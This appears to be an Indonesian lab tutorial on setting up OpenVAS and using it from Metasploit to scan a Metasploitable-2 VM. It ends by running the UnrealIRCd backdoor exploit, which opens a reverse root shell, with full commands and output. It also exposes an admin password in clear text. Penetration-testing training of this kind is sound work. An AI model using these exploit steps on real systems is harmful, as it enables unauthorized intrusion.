Scribd
Upload
661 views

OpenVAS Metasploit

The document describes the steps to check the configuration and functions of OpenVAS. It runs the openvas-check-setup command and reports the results of each step, including checking that the OpenVAS scanner, manager, administrator, GSA, CLI and GSD services are present and running correctly. It finds some warnings around signature checking, password policies and unsupported nmap versions.

Uploaded by

Hendra Nuryuliansyah
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
661 views

OpenVAS Metasploit

The document describes the steps to check the configuration and functions of OpenVAS. It runs the openvas-check-setup command and reports the results of each step, including checking that the OpenVAS scanner, manager, administrator, GSA, CLI and GSD services are present and running correctly. It finds some warnings around signature checking, password policies and unsupported nmap versions.

Uploaded by

Hendra Nuryuliansyah
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 15

http://di.konfigurasi.

in
OpenVAS
Pastikan pengecekan fungsi-fungsi service OpenVAS berjalan dengan baik. Dengan menjalankan
perintah berikut:
root@sockalilnx2:~# cd /usr/bin/
root@sockalilnx2:/usr/bin# ./openvas-check-setup
openvas-check-setup 2.2.3
Test completeness and readiness of OpenVAS-6
(add '--v4', '--v5' or '--v7'
if you want to check for another OpenVAS version)
Please report us any non-detected problems and
help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.
Use the parameter --server to skip checks for client tools
like GSD and OpenVAS-CLI.
Step 1: Checking OpenVAS Scanner ...
OK: OpenVAS Scanner is present in version 3.4.0.
OK: OpenVAS Scanner CA Certificate is present as /var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /var/lib/openvas/plugins contains 36066 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
OK: The NVT cache in /var/cache/openvas contains 36066 files for 36066 NVTs.
Step 2: Checking OpenVAS Manager ...
OK: OpenVAS Manager is present in version 4.0.4.
OK: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 74.
OK: OpenVAS Manager expects database at revision 74.
OK: Database schema is up to date.
OK: OpenVAS Manager database contains information about 36064 NVTs.
OK: OpenVAS SCAP database found in /var/lib/openvas/scap-data/scap.db.
OK: OpenVAS CERT database found in /var/lib/openvas/cert-data/cert.db.
OK: xsltproc found.
Step 3: Checking OpenVAS Administrator ...
OK: OpenVAS Administrator is present in version 1.3.2.
OK: At least one user exists.
OK: At least one admin user exists.
WARNING: Your password policy is empty.
SUGGEST: Edit the /etc/openvas/pwpolicy.conf file to set a password policy.

http://di.konfigurasi.in
Step 4: Checking Greenbone Security Assistant (GSA) ...
OK: Greenbone Security Assistant is present in version 4.0.0.
Step 5: Checking OpenVAS CLI ...
OK: OpenVAS CLI version 1.2.0.
Step 6: Checking Greenbone Security Desktop (GSD) ...
OK: Greenbone Security Desktop is present in Version 1.2.2.
Step 7: Checking if OpenVAS services are up and running ...
OK: netstat found, extended checks of the OpenVAS services enabled.
OK: OpenVAS Scanner is running and listening on all interfaces.
OK: OpenVAS Scanner is listening on port 9391, which is the default port.
WARNING: OpenVAS Manager is running and listening only on the local interface. This means
that you will not be able to access the OpenVAS Manager from the outside using GSD or OpenVAS
CLI.
SUGGEST: Ensure that OpenVAS Manager listens on all interfaces.
OK: OpenVAS Manager is listening on port 9390, which is the default port.
OK: OpenVAS Administrator is running and listening only on the local interface.
OK: OpenVAS Administrator is listening on port 9393, which is the default port.
OK: Greenbone Security Assistant is listening on port 9392, which is the default port.
Step 8: Checking nmap installation ...
WARNING: Your version of nmap is not fully supported: 6.46
SUGGEST: You should install nmap 5.51.
Step 9: Checking presence of optional tools ...
OK: pdflatex found.
OK: PDF generation successful. The PDF report format is likely to work.
OK: ssh-keygen found, LSC credential generation for GNU/Linux targets is likely to work.
WARNING: Could not find rpm binary, LSC credential package generation for RPM and DEB
based targets will not work.
SUGGEST: Install rpm.
WARNING: Could not find makensis binary, LSC credential package generation for Microsoft
Windows targets will not work.
SUGGEST: Install nsis.
It seems like your OpenVAS-6 installation is OK.
If you think it is not OK, please report your observation
and help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem.

Jika menemukan status pengecekan OpenVAS seperti berikut:


root@sockalilnx2:/usr/bin# ./openvas-check-setup
openvas-check-setup 2.2.3

http://di.konfigurasi.in
Test completeness and readiness of OpenVAS-6
(add '--v4', '--v5' or '--v7'
if you want to check for another OpenVAS version)
Please report us any non-detected problems and
help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.
Use the parameter --server to skip checks for client tools
like GSD and OpenVAS-CLI.
Step 1: Checking OpenVAS Scanner ...
OK: OpenVAS Scanner is present in version 3.4.0.
OK: OpenVAS Scanner CA Certificate is present as /var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /var/lib/openvas/plugins contains 36066 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
OK: The NVT cache in /var/cache/openvas contains 36066 files for 36066 NVTs.
Step 2: Checking OpenVAS Manager ...
OK: OpenVAS Manager is present in version 4.0.4.
OK: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 74.
OK: OpenVAS Manager expects database at revision 74.
OK: Database schema is up to date.
OK: OpenVAS Manager database contains information about 36064 NVTs.
OK: OpenVAS SCAP database found in /var/lib/openvas/scap-data/scap.db.
OK: OpenVAS CERT database found in /var/lib/openvas/cert-data/cert.db.
OK: xsltproc found.
Step 3: Checking OpenVAS Administrator ...
OK: OpenVAS Administrator is present in version 1.3.2.
OK: At least one user exists.
OK: At least one admin user exists.
WARNING: Your password policy is empty.
SUGGEST: Edit the /etc/openvas/pwpolicy.conf file to set a password policy.
Step 4: Checking Greenbone Security Assistant (GSA) ...
OK: Greenbone Security Assistant is present in version 4.0.0.
Step 5: Checking OpenVAS CLI ...
OK: OpenVAS CLI version 1.2.0.
Step 6: Checking Greenbone Security Desktop (GSD) ...
OK: Greenbone Security Desktop is present in Version 1.2.2.
Step 7: Checking if OpenVAS services are up and running ...
OK: netstat found, extended checks of the OpenVAS services enabled.

http://di.konfigurasi.in
ERROR: OpenVAS Scanner is NOT running!
FIX: Start OpenVAS Scanner (openvassd).
OK: OpenVAS Manager is running and listening on all interfaces.
OK: OpenVAS Manager is listening on port 9390, which is the default port.
ERROR: OpenVAS Administrator is NOT running!
FIX: Start OpenVAS Administrator (openvasad).
ERROR: Greenbone Security Assistant is NOT running!
FIX: Start Greenbone Security Assistant (gsad).
ERROR: Your OpenVAS-6 installation is not yet complete!
Please follow the instructions marked with FIX above and run this
script again.
If you think this result is wrong, please report your observation
and help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss
Please attach the log-file (/tmp/openvas-check-setup.log) to help us analyze the problem.
Cek port yang masih digunakan oleh openvas dan gsad.
root@sockalilnx2:/usr/bin# netstat -nlpt | grep openvas
root@sockalilnx2:/usr/bin# netstat -nlpt | grep gsad
Jika tidak ada port yang digunakan, Anda dapat menjalankan perintah di bawah ini:
root@sockalilnx2:/usr/bin# openvasmd -p 9390 -a 127.0.0.1
root@sockalilnx2:/usr/bin# openvasmd -a 127.0.0.1 -p 9393
root@sockalilnx2:/usr/bin# gsad --http-only --listen=10.10.9.169 -p 9392
Jika ada port yang dipakai, misalnya seperti berikut:
tcp
0
0 127.0.0.1:9390
0.0.0.0:*
LISTEN

1725/openvasmd

Anda dapat meng-kill-nya terlebih dahulu dengan perintah kill -9 1725


Jalankan service openvassd dan tunggu sampai All plugins loaded cukup lama juga nunggunya
root@sockalilnx2:/usr/bin# openvassd
All plugins loaded
Jalankan service openvasmd
root@sockalilnx2:/usr/bin# openvasmd
Cek port yang telah kita buat sebelumnya, yaitu dengan perintah di bawah ini:
root@sockalilnx2:/usr/bin# netstat -nlpt | grep openvas
tcp
0
0 127.0.0.1:9390
0.0.0.0:*
LISTEN
1725/openvasmd
tcp
0
0 0.0.0.0:9391
0.0.0.0:*
LISTEN
639/openvassd: wait
tcp
0
0 0.0.0.0:9393
0.0.0.0:*
LISTEN
1273/openvasad

http://di.konfigurasi.in
root@sockalilnx2:/usr/bin# netstat -nlpt | grep gsad
tcp
0
0 10.10.9.169:9392
0.0.0.0:*

LISTEN

610/gsad

Jalankan kembali pengecekan OpenVAS cek setup


root@sockalilnx2:/usr/bin# ./openvas-check-setup
Dan pastikan semua Step 1 sampai dengan Step 9 berjalan dengan baik dan terdapat informasi seperti
ini It seems like your OpenVAS-6 installation is OK.
Uji coba mengakses OpenVAS melalui browser untuk memastikan bahwa port 9392 bisa diakses
melalui browser dengan ip 10.10.9.169 :

http://di.konfigurasi.in
Appliactions > Kali Linux > Vulnerability Analysis > OpenVAS > openvas-gsd

http://di.konfigurasi.in
Uji coba mengakses OpenVAS melalui Greenbone Security Desktop untuk memastikan bahwa port
9390 bisa diakses melalui openvas-gsd dengan ip 127.0.0.1 :

Logged in as: admin at 127.0.0.1:9390

http://di.konfigurasi.in
Metasploit
root@sockalilnx2:/usr/bin# msfconsole

msf > load openvas


[*] Welcome to OpenVAS integration by kost and averagesecurityguy.
[*]
[*] OpenVAS integration requires a database connection. Once the
[*] database is ready, connect to the OpenVAS server using openvas_connect.
[*] For additional commands use openvas_help.
[*]
[*] Successfully loaded plugin: OpenVAS
msf > openvas_connect
[*] Usage:
[*] openvas_connect username password host port <ssl-confirm>
msf > openvas_connect admin indosat2014! 127.0.0.1 9390 ok
[*] Connecting to OpenVAS instance at 127.0.0.1:9390 with username admin...
[+] OpenVAS connection successful
msf > openvas_target_create
[*] Usage: openvas_target_create <name> <hosts> <comment>
msf > openvas_target_create Metasploitable-2 10.10.101.14 Scanning
[*] OK, resource created: ed4f1ebf-7b07-420e-8be7-4c940dc940e8
[+] OpenVAS list of targets

http://di.konfigurasi.in
ID Name
Hosts
Max Hosts In Use Comment
-- ---------------- ------ ------0 Localhost
localhost 1
0
1 Metasploitable-2 10.10.101.14 1
0
Scanning
msf > openvas_config_list
[+] OpenVAS list of configs
ID Name
-- ---0 empty
1 Full and fast
2 Full and fast ultimate
3 Full and very deep
4 Full and very deep ultimate
msf > openvas_task_create
[*] Usage: openvas_task_create <name> <comment> <config_id> <target_id>
msf > openvas_task_create Metasploitable-2 Vulnerability-Scanning 1 1
[*] OK, resource created: 6adfb031-a568-4215-8f9c-72145c17f9b1
[+] OpenVAS list of tasks
ID Name
Comment
Status Progress
-- --------------- -------0 Metasploitable-2 Vulnerability-Scanning New -1
msf > openvas_task_start
[*] Usage: openvas_task_start <id>
msf > openvas_task_start 0
[*] OK, request submitted
msf > openvas_task_list
[+] OpenVAS list of tasks
ID Name
Comment
Status Progress
-- --------------- -------0 Metasploitable-2 Vulnerability-Scanning Running 1

http://di.konfigurasi.in
Ketikan kembali openvas_task_list pada metasploit untuk melihat status scanning
msf > openvas_task_list
[+] OpenVAS list of tasks
ID Name
Comment
Status Progress
-- --------------- -------0 Metasploitable-2 Vulnerability-Scanning Done -1

msf > openvas_report_list


[+] OpenVAS list of reports
ID Task Name
Start Time
Stop Time
-- -------------------------0 Metasploitable-2 2014-09-05T19:15:19Z 2014-09-05T19:42:18Z
msf > openvas_format_list
[+] OpenVAS list of report formats
ID Name Extension Summary
-- ---- --------- ------0 ARF xml
Asset Reporting Format v1.0.0.
1 CPE csv
Common Product Enumeration CSV table.
2 HTML html
Single page HTML report.
3 ITG csv
German "IT-Grundschutz-Kataloge" report.
4 LaTeX tex
LaTeX source file.

http://di.konfigurasi.in
5
6
7
8

NBE
PDF
TXT
XML

nbe
pdf
txt
xml

Legacy OpenVAS report.


Portable Document Format report.
Plain text report.
Raw XML report.

msf > openvas_report_download


[*] Usage: openvas_report_download <report_id> <format_id> <path> <report_name>
msf > openvas_report_download 0 2 /root/Desktop/ Metasploitable-2
[*] Saving report to /root/Desktop/Metasploitable-2
msf >
msf > openvas_report_import 0 8
[*] Importing report to database.
msf >
msf > vulns
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.3.4
refs=CVE-2006-7243,CVE-2010-2094,CVE-2010-2950,CVE-2010-3436,CVE-2010-3709,CVE-20103710,CVE-2010-3870,CVE-2010-4150,CVE-2010-4156,CVE-2010-4409,CVE-2010-4697,CVE-20104698,CVE-2010-4699,CVE-2010-4700,CVE-2011-0753,CVE-2011-0754,CVE-2011-0755,BID40173,BID-43926,BID-44605,BID-44718,BID-44723,BID-44951,BID-44980,BID-45119,BID45335,BID-45338,BID-45339,BID-45952,BID-45954,BID-46056,BID-46168
[*] Time: 2014-09-05 19:59:02 UTC Vuln: host=10.10.101.14 name=http TRACE XSS attack
refs=CVE-2004-2320,CVE-2003-1567,BID-9506,BID-9561,BID-11604
[*] Time: 2014-09-05 19:59:02 UTC Vuln: host=10.10.101.14 name=NFS export refs=CVE-19990554,CVE-1999-0548
[*] Time: 2014-09-05 19:59:02 UTC Vuln: host=10.10.101.14 name=OpenSSL CCS Man in the
Middle Security Bypass Vulnerability (STARTTLS Check) refs=CVE-2014-0224,BID-67899
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=X Server refs=CVE-1999-0526
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=/doc directory browsable ?
refs=CVE-1999-0678,BID-318
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=awiki Multiple Local File Include
Vulnerabilities refs=BID-49187
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.9
refs=CVE-2008-5498,CVE-2009-1271,CVE-2009-1272,BID-33002,BID-33927
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=vsftpd Compromised Source
Packages Backdoor Vulnerability refs=BID-48539
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=distcc Remote Code Execution
Vulnerability refs=CVE-2004-2687
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=vsftpd Compromised Source
Packages Backdoor Vulnerability refs=BID-48539
[*] Time: 2014-09-05 19:58:55 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.7
refs=CVE-2008-2371,CVE-2008-2665,CVE-2008-2666,CVE-2008-2829,CVE-2008-3658,CVE-20083659,CVE-2008-3660,CVE-2008-5557,CVE-2008-5624,CVE-2008-5625,CVE-2008-5658,BID29796,BID-29797,BID-29829,BID-30087,BID-30649,BID-31612,BID-32383,BID-32625,BID32688,BID-32948
[*] Time: 2014-09-05 19:58:56 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.6

http://di.konfigurasi.in
refs=CVE-2007-4850,CVE-2007-6039,CVE-2008-0599,CVE-2008-1384,CVE-2008-2050,CVE-20082051,BID-27413,BID-28392,BID-29009
[*] Time: 2014-09-05 19:58:56 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.14
refs=CVE-2007-1581,CVE-2010-0397,CVE-2010-1860,CVE-2010-1862,CVE-2010-1864,CVE-20102097,CVE-2010-2100,CVE-2010-2101,CVE-2010-2190,CVE-2010-2191,CVE-2010-2225,CVE-20102484,CVE-2010-2531,CVE-2010-3065,BID-38708,BID-40948,BID-41991
[*] Time: 2014-09-05 19:58:57 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.5
refs=CVE-2007-3996,CVE-2007-4782,CVE-2007-4783,CVE-2007-4784,CVE-2007-4825,CVE-20074840,CVE-2007-4887,CVE-2007-4889,CVE-2007-5447,CVE-2007-5653,CVE-2007-5898,CVE-20075899,CVE-2007-5900,CVE-2008-2107,CVE-2008-2108,CVE-2008-4107,BID-26403
[*] Time: 2014-09-05 19:58:58 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.3.3
refs=CVE-2010-1917,CVE-2010-3062,CVE-2010-3063,CVE-2010-3064,BID-40461
[*] Time: 2014-09-05 19:58:59 UTC Vuln: host=10.10.101.14 name=PHP-CGI-based setups
vulnerability when parsing query string parameters from php files. refs=CVE-2012-1823,CVE-20122311,CVE-2012-2336,CVE-2012-2335,BID-53388
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.11
refs=CVE-2009-3291,CVE-2009-3292,CVE-2009-3293,CVE-2009-3294,CVE-2009-4018,CVE-20095016,BID-36449,BID-44889
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.3.1
refs=CVE-2009-3557,CVE-2009-3559,CVE-2009-4017,CVE-2010-1128,BID-36554,BID-36555,BID37079,BID-37138
[*] Time: 2014-09-05 19:59:00 UTC Vuln: host=10.10.101.14 name=PHP version smaller than 5.2.8
refs=CVE-2008-5814,CVE-2008-5844,BID-32673
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=Apache HTTP Server 'httpOnly'
Cookie Information Disclosure Vulnerability refs=CVE-2012-0053,BID-51706
[*] Time: 2014-09-05 19:59:03 UTC Vuln: host=10.10.101.14 name=Samba 'client/mount.cifs.c'
Remote Denial of Service Vulnerability refs=CVE-2010-0547,BID-38326
[*] Time: 2014-09-05 19:59:04 UTC Vuln: host=10.10.101.14 name=openssh-server Forced Command
Handling Information Disclosure Vulnerability refs=CVE-2012-0814,BID-51702
[*] Time: 2014-09-05 19:59:04 UTC Vuln: host=10.10.101.14 name=ICMP Timestamp Detection
refs=CVE-1999-0524
[*] Time: 2014-09-05 19:59:04 UTC Vuln: host=10.10.101.14 name=Anonymous FTP Checking
refs=CVE-1999-0497

http://di.konfigurasi.in
msf > search unreal
Matching Modules
================
Name
----

Disclosure Date Rank


Description
--------------- --------------

exploit/linux/games/ut2004_secure
Overflow (Linux)

2004-06-18

good

exploit/unix/irc/unreal_ircd_3281_backdoor 2010-06-12
Backdoor Command Execution
exploit/windows/games/ut2004_secure
"secure" Overflow (Win32)

2004-06-18

Unreal Tournament 2004 "secure"

excellent UnrealIRCD 3.2.8.1


good

Unreal Tournament 2004

msf > use exploit/unix/irc/unreal_ircd_3281_backdoor


msf exploit(unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- ----------RHOST
yes
The target address
RPORT 6667
yes
The target port
Exploit target:
Id Name
-- ---0 Automatic Target
msf exploit(unreal_ircd_3281_backdoor) > set RHOST 10.10.101.14
RHOST => 10.10.101.14
msf exploit(unreal_ircd_3281_backdoor) > exploit -j
[*] Exploit running as background job.
[*] Started reverse double handler
msf exploit(unreal_ircd_3281_backdoor) > [*] Connected to 10.10.101.14:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
[*] Sending backdoor command...
[*] Accepted the first client connection...

http://di.konfigurasi.in
[*] Accepted the second client connection...
[*] Command: echo t3FDGGfytnArjDEX;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "t3FDGGfytnArjDEX\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 1 opened (10.10.9.169:4444 -> 10.10.101.14:49793) at 2014-09-05
16:03:27 -0400
TEKAN ENTER
msf exploit(unreal_ircd_3281_backdoor) > sessions -l
Active sessions
===============
Id Type
Information Connection
-- -------------- ---------1 shell unix
10.10.9.169:4444 -> 10.10.101.14:49793 (10.10.101.14)
msf exploit(unreal_ircd_3281_backdoor) > sessions -i 1
[*] Starting interaction with 1...
pwd
/etc/unreal
cd /home
ls
ftp
msfadmin
pilou
service
user
whoami
root
ifconfig eth0
eth0 Link encap:Ethernet HWaddr 00:0c:29:e2:2b:c0
inet addr:10.10.101.14 Bcast:10.10.101.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fee2:2bc0/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:114561616 errors:57 dropped:404 overruns:0 frame:0
TX packets:5022645 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:3265641210 (3.0 GB) TX bytes:3581906147 (3.3 GB)
Interrupt:19 Base address:0x2000

http://di.konfigurasi.in
Referensi:
http://www.youtube.com/watch?v=K90XE5g_-S0
http://www.ehacking.net/2011/11/how-to-use-openvas-in-metasploit.html
http://resources.infosecinstitute.com/vulnerability-scanning-metasploit-part-2/

You might also like